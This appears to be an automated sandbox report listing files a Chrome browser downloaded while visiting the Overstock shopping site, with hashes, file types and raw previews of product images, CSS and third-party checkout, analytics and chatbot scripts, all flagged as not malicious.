                                                                                                                                                          Preview:CgkKBw2RYZVOGgA=
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6952
                                                                                                                                                          Entropy (8bit):7.82457255854738
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:5AEC2E0F4C2AC274B99358C91FCAD380
                                                                                                                                                          SHA1:31D9E3372F162403E94E6B57C45F9988E37DBB6D
                                                                                                                                                          SHA-256:FCD60CFE0D2B4CF705ACD6948D637EF52D1220C11CAC8308ED90D68C62F29989
                                                                                                                                                          SHA-512:61C1B1A031E0767C82B5935AAFC034F8BA5FA79C18FA8146802818638BB0CF934009A417AB9CDE3283EE9882483C0FD2F5F4FA23C294B1ADA925963D7AA87818
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/100_25-Solid-Wood-Set-of-4-Small-Shelves-for-Kyle-Wardrobes_825ef5c5-c173-4981-ae68-4d18e38f13c6.jpg?v=1717154154&width=320
                                                                                                                                                          Preview:RIFF ...WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .....t...*@.@.>9..D.!..(.0...._:T..o.=*.@wp..-....':.;.?#.m.<..{...G...`=............O..s...;...;.........O.P.@.9........?...|.................Fx....>......c.....;}....?....).......>.r..z.....N...?.7...}.=$......../._...2.e...../._.....&..h..r.]lX<.E..C..`V....2.w........=.Q..E.}VNz..{....ip,..&]O(W.>.#.]...'.&.~.6wn.Q%$..G.Wh..9tV....R^~i*..,.{.....!k0..IY.....+..W..^.}....td.L)...].D...._.".F.....9..H...K...X...+=......R...V...h..x..r.|2e..[..\h...IV.;X S.,.3H.Y.....;4.+f...M...xa..O...z..%20.?>.=...2...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):42446
                                                                                                                                                          Entropy (8bit):7.98719008684698
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:59329FFDB7A02D81455F185A32314DEE
                                                                                                                                                          SHA1:1346C4F18007AB94A67F1486688BDAF34A6C7F3F
                                                                                                                                                          SHA-256:23EDC2310A771F27F8C355897C2BB8474F0B5E8EA103505C0661C051F55D7615
                                                                                                                                                          SHA-512:C811C53E22CDA845AFE8CD45C3324140F7CBBD2BA232FB705CA826014F9E7EA7038AFDD53920C4FFB884B5419C4889EF6F96BADE6A4AF07DA4002D6A925AD4E1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/Mandalay-4-foot-Eco-friendly-Synthetic-Wood-Garden-Bench-by-Havenside-Home_9f956ae2-e516-4490-a09f-c416273d7a70.jpg?v=1717127747&width=320
                                                                                                                                                          Preview:RIFF...WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 6....k...*@.@.>9..C"!.......P.3.j.|:.....sO..c..]M|w./-.l._..o............./.O^..w_....@|........s....._...?.................~........C...3._......../..................~........w......?..w.....?........O._..s.1.;.W........W.;......?l~A...k.k./.g.........O..Z...c../..R.U.....?.._7.....7..........c.........?..v...7...O._.................?..................\._.'...?..a?.?.....................;.....G.g.....b.....XcX.C.s..KI)...]#*....2..&....4@.y2+.]..'S.d...i...O)dM*.v.Q>O-j..{..Z9.....j1.*...;....R..:.m..?.k.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):38303
                                                                                                                                                          Entropy (8bit):7.968670357565545
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:6BD39A88406AB6D7D5DDA2B51A09C8A3
                                                                                                                                                          SHA1:15BC106E7DC7D40EF05621060E639F84D426D1D8
                                                                                                                                                          SHA-256:032F0DC974BE3137352C4EBF0C5640845FB184312BAA5D2940D6B753D0A3FF8D
                                                                                                                                                          SHA-512:BEBBCFD48E4A28ED2F94B0A698BC2A537A4A112A919755C620B2F04862ECE467AE36886FC9AF7E0E87687160C442011DBE76224934C7B4A04EB1A43993AFF540
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@....................................................................................Z=..F.x.....;.1.UQ.T.....:\.&|W..6........=..c>..::N..j..... ...Z.....8/hx?...|9....o=k.T......@..#.....9...~yW.0.\.s..3......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2228
                                                                                                                                                          Entropy (8bit):7.82817506159911
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                                                                                                          SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                                                                                                          SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                                                                                                          SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6628
                                                                                                                                                          Entropy (8bit):4.739154030964975
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:F9606CB9F5ED1FD407BAC730355A6013
                                                                                                                                                          SHA1:8069BCD1F16BCD1C807886C87F14CE6B1E635AFC
                                                                                                                                                          SHA-256:01B5E4649BE7E134E963A189DE21F3B04DE8D5AEBC3E28B399858FA5025DF322
                                                                                                                                                          SHA-512:64F049EE9F85BA47DC18910991DD40EA59F911A4BF0DAB16DC1496CE0A0C58B631951E968C7A1C501F6861CA55559E8E057987F5C7F4E5B1275F6518089D611D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/proxy/3b78d0c73fafccdc56f608bc60a9d06abec748d32dc6f56c8c07955673068d06/r4.cloud.yellow.ai/api/galaxy/genericIntegration/shopify-sdk/x1711463078876/overstock_production?id=BcOZghlvRm/xDQ%2B5JyfxeLa8DrKFvlDs8l8ARsN2MrA=&shop=a37a28-2.myshopify.com&sp-cache-control=cHVibGljLCBtYXgtYWdlPTkwMA
                                                                                                                                                          Preview:function getCookieValue(key) {. const cookies = document.cookie.split(';'). for (let i = 0; i< cookies.length; i++) {. const cookie = cookies[i].trim(); // louserzation=IN. if(cookie.startsWith(key + '=')) {. return cookie.substring(key.length + 1). }. }. return false;. }. // Function to generate a new session ID. function generateSessionId() {. const timestamp = Date.now();. const randomString = Math.random().toString(36).substring(2);. const sessionId = `ym_${timestamp}_${randomString}`;. return sessionId;. }. . // Function to get fetch cart details.. function fetchCartData() {. return window.fetch(`${window.location.origin}/cart.js`). .then(res => res.clone().json()). .catch( err => console.log()). }. function sendEvent(data, eventName) {. const urlDetails = {"botId":"x1711463078876","customer":"overstock_production","id":"BcOZghlvRm%2FxDQ%2B5JyfxeLa8DrKFvlDs8l8ARsN2MrA%3D","origin":"r4.cloud.yellow.ai"} .
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (61318)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):63548
                                                                                                                                                          Entropy (8bit):5.5140402843041025
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:358B9FA3D1C0A5A6F69230F939DCD5F5
                                                                                                                                                          SHA1:3C145468B93FECA1FBD6C953DDD22BDD46632BD7
                                                                                                                                                          SHA-256:A3EC9EF3075B9F32F3C9CF02A5ABB6CCBF2A1BEAA7034C70056A6BCCE5791952
                                                                                                                                                          SHA-512:0BBD61219DE20ECA2BD75F097529F37BAA35697A5BBBA464105F3F1D698F7AB10052237AE48C2433D1BD5F75338CFC27C6BD37F3589C7DD472041409BD2FE8BE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/wpm@8688a91bwbd065f36p51297ecfmc385dee2/custom/web-pixel-26050719@9/sandbox/modern/
                                                                                                                                                          Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <title>Web Pixels Manager Sandbox</title>. <script type="text/javascript">. (()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));va
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (5945)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):333221
                                                                                                                                                          Entropy (8bit):5.600300299127318
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:9AF6F6044D553381CF94B5BF18AE1038
                                                                                                                                                          SHA1:1001B41C963331BB1F5D7589462A3378F6046F86
                                                                                                                                                          SHA-256:E7CAAAA27738440C08FF43A13C03D99E16C75DA2BE55AAC823AF63B915D703B1
                                                                                                                                                          SHA-512:BCEA824792D20DAF0E8B38284B3691440836F79D40908687643C45492A3A941399555A24BDA9E55F6E119A55510C862D4959B3B716CCFE27FB8F014A8B00CC41
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":14,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (4649)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4650
                                                                                                                                                          Entropy (8bit):5.402341431225673
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:B9DC5872D726648CC23A49814A9F03EB
                                                                                                                                                          SHA1:C4AA518AA61CCF178A79DF2354A0E8F9DA28848F
                                                                                                                                                          SHA-256:2A9A0A73D974D3F9B86BE6AF1961B0983DB405F86871654C92080E7AA70FBAE2
                                                                                                                                                          SHA-512:A53FC37D3DE25AE45EE70D3D5A0943F43F068D341E696384576FF46835EBA5BF567417928B3AB55D6AE851D01A0E858882102A98CFFB32818FA99E36EC40DA94
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/ShopPayLoginLoader.C5akmUKr.js
                                                                                                                                                          Preview:import{c as ne,aN as se,oQ as z,cy as te,q as u,c1 as ie,h as I,oR as re,H as F,e as G,v as ce,o as K,r as le,cI as C,A as ue,t as he,bH as de,j4 as W,cG as me,iH as pe,bv as ge,T as V,ij as J,y as g,cJ as q,oS as $,oT as fe,a as o,aa as ye,bM as Se,hj as Pe,oU as Le,oV as _e,hh as ke,bR as be,V as Q,hZ as Ie,cL as Ce,ff as Te,jb as we,N as ve,O as Ae,bC as Ee,cN as k,fc as j,h$ as Oe,ma as Re,k as h,ad as Me,$ as De,a5 as Ne,z as He,oW as Ue}from"./app.CRtF78CU.js";import{a as ze,u as Z,b as Ve,p as $e,S as je,U as xe}from"./publishMessage.Zuhtx4a1.js";import{S as b,b as Fe,u as Ge}from"./Section.DDmRJFSq.js";const Ke=ne(!1);function We(){const a=se(),s=Object.keys(z).map(e=>[e,te[e]]),t=u(async()=>{s.forEach(([e,r])=>{a.write(r,z[e])})},[a,s]);return{shopPayLogout:Ke,resetShopPayParts:t}}const Je="_5Z70J",qe={LoginIframe:Je},Qe="shop-pay-login-iframe",Ze="100%",x="c1_login",Ye=250;function Be(){const a=ie(We().shopPayLogout),[s,t]=I(!0),[e,r]=I(Ye),c=re(),{progress:i}=F(),f=G(),d=ce(
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22007
                                                                                                                                                          Entropy (8bit):7.910966838343087
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:365F3E7650C8B19AAD450F7D30187C28
                                                                                                                                                          SHA1:821E592C86F262A31D9CD86679F3821B65C89F7B
                                                                                                                                                          SHA-256:CB8B4B2DB6860EDA063CB053444C0AFD7EF1697CA42E901A571A57D130B12F06
                                                                                                                                                          SHA-512:501B5CC00524DA3335467D658D5B260169D824B71D1DB4249E3BB16B456B2ECACB01E830EA3AFA26168BD43B1E760E855F0F696F0CE4D483EF73B64444BE62B6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@....................................................................................,............................................................................................................................fE.!.Y...(
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):36657
                                                                                                                                                          Entropy (8bit):4.9633458805408495
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:6FD0BEDCAFDBFD7AB13934A645568485
                                                                                                                                                          SHA1:5C39A1033D594C510FD4C56697E7F18EB13BB301
                                                                                                                                                          SHA-256:6D37BCB2075B0AA44A84CB22F04B25BCDE41D0ADF231665159F471438BDCE39F
                                                                                                                                                          SHA-512:E959C6243560CB79E8767389D8B1349EE317311CBCDC311EE6B0F6E27355C2120202BE683830CF139B98D3F4B83AF52E57C2076EE01A0E3075AD646289C6D999
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:console.log("inside shippingDiscount.js");....let gfgShippingDiscountV2 = {.. state: {.. isFirstRenderForShippingDiscount: true,.. productFound: {},.. productVariantFrount: {},.. collectionFound: {},.. appBlockKeyMap: {.. tBarHeadingFontSize: "titleBarHeadingFontSize",.. tBarHeadingFontWt: "titleBarHeadingFontWeight",.. tBarSubHeadingFontSize: "titleBarSubHeadingFontSize",.. tBarSubHeadingFontWt: "titleBarSubHeadingFontWeight",.. tBarTextColor: "titleBarTextColor",.. tBarBackgroundColor: "titleBarBackgroundColor",.. widgetBodyFontSize: "widgetBodyFontSize",.. widgetBodyFontWt: "widgetBodyFontWeight",.. widgetBodyBackgroundColor: "widgetBodyBackgroundColor",.. widgetBodyBorderColor: "widgetBodyBorderColor",.. },.. },.. init: function () {.. try {.. let settings = gfg.settings;.. let _shippingDiscountData = settings.shippingDiscount;.... const page_type = gfg.f.getPageType();.. if (page_type ===
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):20428
                                                                                                                                                          Entropy (8bit):7.963581933615789
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:BF2563E7029F08739B55D14E6378CD9F
                                                                                                                                                          SHA1:9673FF3672BE709E1B0198952C50BB78E35DEC38
                                                                                                                                                          SHA-256:BAFF05FCA24A803E3FB6AC289F60BA08D9CA7DBCF1D41A94CDF24F7F5C9F1EDA
                                                                                                                                                          SHA-512:86B84997F128D0E42F45E89EB579DB2C0DEF94A69B302F72CD4ECF260DA64E7ED1EA56C9B416E6BB7612958E4B9E6C90AC4F809D90CE659BCB0F8427B832596F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/Leviton-Solid-Wood-Tufted-Asons-Dining-Chair-_28Set-of-2_29_0b91b344-8783-4c27-8712-cbf7dcd0311b.jpg?v=1717131125&width=320
                                                                                                                                                          Preview:RIFF.O..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 4M.......*@.@.>9..C.!..i.@ .....OWQ..........V.'$.y........v.._.........~...(y............LOV..~v.....zS..........C.?i?)|....?......~...._.?..........~........m...._.w..z...g....-.7...^........]....`o.?..........S....?.{.t....4.bK.....Y.oO...\L,.G.eX...q..L..>y.........d`........T....Y....3.j....v..L.}3.i[.....g..|..=.,.;%-0v.M..,r@h..`.]E'.L.$.-J.V.e........P.nYH..x.4Y......!.92T.b...23.*.L.o.9"..T..0...N.m~6.G.~y|G.?6.....(...."Y5........k!......V2.E.s~.!4.ZmZ.6..0.iWG.B..O.y..n1.A'Hjd..#.....Q.D&..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (11918)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):12166
                                                                                                                                                          Entropy (8bit):5.072381362867639
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:0453C4A8D0AB2EC087D87A909214A19B
                                                                                                                                                          SHA1:0B150403E41C47F19E0D672969FEFBD8A9546984
                                                                                                                                                          SHA-256:0C2753F747D0D624BEF044A520BB733A316C53FE0D92308966BE70CAFEA4E2E9
                                                                                                                                                          SHA-512:7D97EE201CEBDEB0204BB04B11959C45272A62AB94F54EEB9CF3F409FE1440D20585B317F6EBBE6F677085E5B3922D55202D289F1B540779EB44D77F28602A8A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/SubscriptionPriceBreakdown.CcRBYBQn.js
                                                                                                                                                          Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["SubscriptionGroupLine.CbIhyb-3.js","app.CRtF78CU.js","assets/app.BK5OxPpc.css","StackedMerchandisePreview.B7T1npCx.js","assets/StackedMerchandisePreview._xnAOXmq.css"])))=>i.map(i=>d[i]);.import{ff as w,fk as R,q as x,bJ as T,bK as B,_ as k,e as f,cc as I,a as h,aF as L,cf as b,cj as C,ay as M,k as q,bM as N,b5 as E,b7 as A,di as $,aa as G,lK as U,a7 as S}from"./app.CRtF78CU.js";function ie(){const e=w(),o=R();return x((s,t,c)=>{const p=o.value.defaultAttributes?.shopId||1,r={schemaId:"checkout_display_shipping_methods/1.0",payload:{eventTimestamp:t,shopId:p,apiClientId:c,promiseRetrievalTime:s}};e.record(r)},[e,o.value.defaultAttributes?.shopId])}const j=T({load:()=>B(()=>k(()=>import("./SubscriptionGroupLine.CbIhyb-3.js").then(e=>e.a),__vite__mapDeps([0,1,2,3,4])))});function re({subscriptionLines:e}){const o=f(),{extensionsBefore:u,extensionsAfter:s}=I({targeted:!0,hasMultipleDeliveryGroups:!0}),t=e.length;return t===0?null:h
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2070), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2070
                                                                                                                                                          Entropy (8bit):5.183615088784809
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:2FFD16EB546C58306A83AEDC8A802C06
                                                                                                                                                          SHA1:51ACBC6BD54EFD7176241E2DD119C0037D8685D2
                                                                                                                                                          SHA-256:EA6C1A3E11533B4AC5ECCF2D58C500C476C58EA484A2442685FA3BC7D320599F
                                                                                                                                                          SHA-512:43C269701EFC5D0AFC5951F0AB66483A9F2AB8CFABA802E5D9C9AA729D928115252E00DC7284F138B9EDB73066ABF292A9E4C61DDECE775C8B44161ECE5351DB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:(function(){function r(){var e=null;if(window.braze!==undefined){e=window.braze}else if(window.appboy!==undefined){e=window.appboy}return e}function o(e){const t=100;window.setTimeout(function(){if(r()!==null&&r().getUser()){e()}else{o(e)}},t)}function s(e,o,n){fetch(e+".js").then(e=>e.json()).then(e=>{var t={id:e.id,title:e.title,price:e.price,vendor:e.vendor,images:e.images,shopify_storefront:n};r().logCustomEvent(o,t);r().requestImmediateDataFlush()})}function n(){const e=new URL([...document.getElementsByTagName("script")].map(e=>e.src).find(e=>e.includes("braze-product-script")));const t=new URLSearchParams(e.search);return Object.fromEntries(t.entries())}function a(e){const t=e.lastIndexOf("/")+1;const o=e.indexOf("?")>0?e.indexOf("?"):e.length;return e.substring(t,o)}function c(e,t,o,n,r,i){productName=a(t);const c=JSON.parse(localStorage.getItem(o)||"{}");lastEventTimeForProduct=c[productName]||0;if(r-lastEventTimeForProduct>i){c[productName]=r;localStorage.setItem(o,JSON.strin
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):142
                                                                                                                                                          Entropy (8bit):4.673973196938329
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:91BF87F496C55CC46105FC59A2972152
                                                                                                                                                          SHA1:EA2CA6E12408FD3313029825E35CF2BB1555ADC0
                                                                                                                                                          SHA-256:86C50B33E879C49A8261F88FF912AD6EC3F9C467BE2B4F2AB60689C03BEBCB2C
                                                                                                                                                          SHA-512:05C52F327787D203BA2FE6AC28D26CF1B3F3F09F17998EE37EDCFFD90AFADC779B4933B153CC45682E415537AD61565432C1B7E75F6BB232265D7D333058E386
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"36276517","rollup":{"average_rating":4.5,"rating_count":8,"review_count":8,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (5403)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5515
                                                                                                                                                          Entropy (8bit):4.973789672322262
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:B84DDF6F1F8E38382A342400C66CAA12
                                                                                                                                                          SHA1:063A9E6962CE2CCAC4AD51159FC6D9ADACE297EB
                                                                                                                                                          SHA-256:5B1E69CEE5880DCD5D17E47807AFE1FCECCA5FBF57EF2D4B30893F989C6192D5
                                                                                                                                                          SHA-512:609F70C3B9D9DF69372ADE39235C8D1613C4A1745309DE7C7B65CF232BBB64B08FF9AFDAB950D8CDBDA0F979DD1C8B06B15E93BE322FF0334D781E63927622CE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/component-card-overlay.css?v=140449735698214635831729142870
                                                                                                                                                          Preview:.card-overlay{border-radius:2px;height:0;padding-bottom:100%;position:relative;color:var(--color-base-white);display:block;overflow:hidden}.card-overlay:before{content:"";position:absolute;top:0;left:2rem;z-index:2;height:5px;width:42px;background:rgb(var(--color-accent-2))}.card-overlay:after{content:"";pointer-events:none;top:0;left:0;position:absolute;width:100%;height:100%;border-radius:2px}.settings-remove-ribbons-true .card-overlay:before{display:none}.collection .card-overlay{height:100%;padding-bottom:100%}.card-overlay.card-overlay-off:before,.card-overlay.card-overlay-off:after{content:none}@media (max-width: 749px){.product-grid .card-overlay,.product-grid .card-overlay .card-overlay-media{border-radius:0}}@media (min-width: 990px){.card-overlay:before{left:min(10%,3rem)}}@media (min-width: 750px){.grid-1-col-desktop .card-overlay{padding-bottom:48.5%}}@media (min-width: 750px){.grid-1-col-desktop .card-overlay{padding-bottom:38.5%}}@media (min-width: 1200px){.grid-1-col-des
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):121
